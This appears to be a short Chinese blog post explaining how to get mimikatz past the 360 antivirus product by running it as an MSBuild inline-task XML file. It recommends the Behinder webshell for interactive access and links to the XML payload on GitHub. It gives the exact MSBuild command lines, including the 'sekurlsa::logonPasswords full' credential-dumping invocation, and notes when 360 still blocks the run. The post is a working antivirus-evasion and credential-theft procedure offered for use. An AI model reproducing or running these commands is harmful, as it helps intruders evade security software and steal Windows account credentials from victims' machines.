mimikatz_xml_bypass360

各个大佬都在分享各种bypass av的方法,我来分享下mimikatz bypass 360的一个思路。
这个传出来也好久了,通过msbuild来执行xml的mimikatz达到绕过导出的想法。
前提:
1、能够交互方式执行cmd(推荐使用冰蝎)
2、权限能够执行debug(id:500)
3、.net 4.0
关于msbuild的介绍:
MSBuild 是 Microsoft 和 Visual Studio的生成系统。它不仅仅是一个构造工具,应该称之为拥有相当强大扩展能力的自动化平台。MSBuild平台的主要涉及到三部分:执行引擎、构造工程、任务。其中最核心的就是执行引擎,它包括定义构造工程的规范,解释构造工程,执行“构造动作”;构造工程是用来描述构造任务的,大多数情况下我们使用MSBuild就是遵循规范,编写一个构造工程;MSBuild引擎执行的每一个“构造动作”就是通过任务实现的,任务就是MSBuild的扩展机制,通过编写新的任务就能够不断扩充MSBuild的执行能力。

过程:
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
将xml文件保存在本地,这里我放到目标机器的桌面上。

图片1.png
以管理员权限执行cmd:

#C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\123\Desktop\mimikatz.xml

图片2.png
图片3.png
没有任何提示弹窗和拦截,直接就执行了。
但是有个不太明白的情况就是如果我是执行的导出hash > 1.txt这种情况,360就会拦截,不太明白360的拦截机制是怎么判断的

#C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe mimikatz.xml "privilege::debug" "sekurlsa::logonPasswords full" exit

本文链接:

http://8sec.cc/index.php/archives/24/
1 + 6 =
快来做第一个评论的人吧~